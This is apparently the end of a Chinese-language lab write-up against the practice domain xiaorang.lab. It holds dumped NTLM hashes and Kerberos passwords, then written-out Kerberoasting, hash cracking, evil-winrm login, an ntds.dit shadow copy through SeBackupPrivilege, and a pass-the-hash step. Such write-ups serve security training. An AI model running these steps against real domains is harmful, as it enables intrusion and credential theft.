         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64816 (00000000:0000fd30)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:55
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64798 (00000000:0000fd1e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:55
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:54
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33907 (00000000:00008473)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:54
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33871 (00000000:0000844f)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:54
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 7061711 (00000000:006bc0cf)
Session           : RemoteInteractive from 3
User Name         : calmsec
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/27 17:27:53
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : calmsec
         * Domain   : XR-0923
         * NTLM     : 579da618cfbfa85247acf1f800a280a4
         * SHA1     : 39f572eceeaa2174e87750b52071582fc7f13118
        tspkg :
        wdigest :
         * Username : calmsec
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : calmsec
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 7061603 (00000000:006bc063)
Session           : RemoteInteractive from 3
User Name         : calmsec
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/27 17:27:53
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : calmsec
         * Domain   : XR-0923
         * NTLM     : 579da618cfbfa85247acf1f800a280a4
         * SHA1     : 39f572eceeaa2174e87750b52071582fc7f13118
        tspkg :
        wdigest :
         * Username : calmsec
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : calmsec
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 7047666 (00000000:006b89f2)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 17:27:52
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5739362 (00000000:00579362)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/27 17:18:14
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5698766 (00000000:0056f4ce)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 17:18:13
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5698541 (00000000:0056f3ed)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/27 17:18:13
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 5697720 (00000000:0056f0b8)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/27 17:18:13
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : c5 6d 0f 14 42 3f 4f a9 19 56 7f 72 a8 a6 52 f1 00 7a 75 36 a2 ff bc 83 e4 a1 63 44 88 de 31 7a c0 55 5d 9c 5c 89 4c 2a 34 81 ff e3 7b 62 e9 3d 17 89 ad 0c b2 e4 3f 7e 15 c1 87 e3 3c 69 31 02 0e 07 86 67 8c 58 b1 62 81 88 ff 13 48 cd 02 59 b3 27 4e 7e 3a c8 8e 93 cf e7 f0 e0 78 cb ee ca bc 07 61 81 f1 1c 16 b7 cf 4f 91 6e a3 16 1b 5a fc 9d 0f 50 9c 7d d7 1f 75 53 d8 09 86 8c 3b 2d 54 31 bb fd 73 af ac ca 3a b8 5b e9 b9 7a b4 22 7e bc 9e b0 d2 35 4d 39 03 92 c0 1b 77 a3 59 42 65 bc 21 14 74 e7 33 4e 60 a2 b6 cb 4a 1a e5 6e de bc c3 8f cc da a9 97 78 de d8 8a 46 31 4d 67 3f b2 af 50 ea ac d8 ce b2 0c 1b 6a 36 0d ea f0 0d 89 dd 49 80 99 ba 1d a3 f7 aa ef 93 2c cd 39 96 87 f0 7f 14 ea 1f a0 45 1b 4f 71 a6 4e 4b be
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:57
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:55
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 32753 (00000000:00007ff1)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:54
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 92bb9473498c75f05bec862d84167bb8
         * SHA1     : e3e7fed691061091b244e237331388e85c790b1f
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/27 16:14:54
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :
        cloudap :

拿着 XR-0923$ 的ntlm哈希看SPN能找到一个tianjing用户

1	proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':92bb9473498c75f05bec862d84167bb8' -dc-ip 172.22.14.11

看到tianjing抓一下hash

1	proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':92bb9473498c75f05bec862d84167bb8' -dc-ip 172.22.14.11 -request-user tianjing

爆破hash

1	john hash --wordlist=/usr/share/wordlists/rockyou.txt

1	tianjing:DPQSXSXgh2

evil-winrm登录

1	proxychains evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2

SeBackupPrivilege 拷贝 sam

有备份以及还原文件或目录的权限，可以卷影拷贝然后读sam(SAM是安全账户管理器数据库，包含了本地用户及用户组,包括它们的口令及其他属性，位于注册表的HKLM__SAM下面)

本地创一个raj.dsh，写入

set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:

接着用unix2dos raj.dsh转化格式

然后切换到C目录，然后创一个test文件夹切换过去(不然后面会没权限)，把本地的raj.dsh上传上去

1
2
3

mkdir test
cd test
upload raj.dsh

卷影拷贝

diskshadow /s raj.dsh

复制到到当前目录，也就是我们创建的这个test目录

1	RoboCopy /b z:\windows\ntds . ntds.dit

最后把sam下下来，命令是download ntds.dit

接下来下载system

1 2	reg save HKLM\SYSTEM system download system

最后用download下来的ntds.dit和system本地进行解密

1	impacket-secretsdump -ntds ntds.dit -system system local

拿到hash，打pth

1	proxychains evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"